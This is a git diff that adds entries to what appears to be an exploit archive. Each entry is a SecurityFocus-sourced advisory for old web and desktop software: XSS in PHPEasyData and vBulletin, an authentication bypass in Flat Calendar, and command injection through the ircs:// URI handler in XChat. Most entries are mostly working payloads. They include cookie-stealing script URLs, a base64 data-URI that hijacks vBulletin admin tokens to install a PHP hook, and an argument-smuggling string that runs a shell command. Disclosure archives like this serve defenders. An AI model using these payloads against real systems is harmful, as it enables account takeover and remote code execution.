@@ +source: http://www.securityfocus.com/bid/29659/info + +PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHPEasyData 1.5.4 is vulnerable; other versions may also be affected. + +http://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/31907.txt b/platforms/php/webapps/31907.txt new file mode 100755 index 000000000..cb0b14731 --- /dev/null +++ b/platforms/php/webapps/31907.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/29659/info + +PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHPEasyData 1.5.4 is vulnerable; other versions may also be affected. + +http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscript%3Ealert(document.cookie)%3C/script%3E + +http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E + +http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/31908.txt b/platforms/php/webapps/31908.txt new file mode 100755 index 000000000..e31f0187d --- /dev/null +++ b/platforms/php/webapps/31908.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29662/info + +Flat Calendar is prone to multiple authentication-bypass vulnerabilities because it fails to perform adequate authentication checks. + +An attacker can exploit these issues to gain unauthorized access to the application and make arbitrary changes to its configuration. This may lead to further attacks. + +Flat Calendar 1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/calender_path/admin/add.php +http://www.example.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid] + + diff --git a/platforms/php/webapps/31910.txt b/platforms/php/webapps/31910.txt new file mode 100755 index 000000000..77035d062 --- /dev/null +++ b/platforms/php/webapps/31910.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29704/info + +vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +vBulletin 3.7.1 and 3.6.10 are vulnerable; other versions may also be affected. + +http://www.example.com/vB3/admincp/index.php?redirect={XSS} +http://www.example.com/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K +http://www.example.com/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdXBsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3Rv + diff --git a/platforms/windows/remote/31909.html b/platforms/windows/remote/31909.html new file mode 100755 index 000000000..b02c2edbf --- /dev/null +++ b/platforms/windows/remote/31909.html @@ -0,0 +1,41 @@ +source: http://www.securityfocus.com/bid/29696/info + +XChat is prone to a vulnerability that allows remote attackers to execute arbitrary commands in the context of the vulnerable user. This issue may lead to a remote compromise. + +The issue arises because of improper handling of the 'ircs://' URI. + +XChat 2.8.7b and prior versions are vulnerable to the issue. + +################################################################################################################## +# +# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched) +# Vendor : http://xchat.org/ +# Affected Os : Windows * +# Risk : critical +# +# This bug is related to the URI Handler vulnerability but the approch is a bit different. +# We don't use any % or ../../../ as the others related bugs, just a single " +# According to the registry , when the IRCS:// URI is called , the command launched is : +# C:\Program Files\xchat\xchat.exe --existing --url="%1" +# +# The xchat --help option tells us : +# " --command=COMMAND :Send a command to existing xchat " +# +# So we add a simple " at the end of the URL and we're in business ? +# Yep =) ircs://blabla@3.3.3.3" --command "shell calc" +# +# Note: The victim needs to be connected to an irc server , and also need IE * . +# +# +# +# Greetz: French/Quebec community, http://spiritofhack.net/ +# +# "If in times like theses you can talk about individual freedoom, you're propably a terrorist" +# +# Poc: this only launch the calc, sky is the limit passed this point. + +Welcome to my personal website + + + + \ No newline at end of file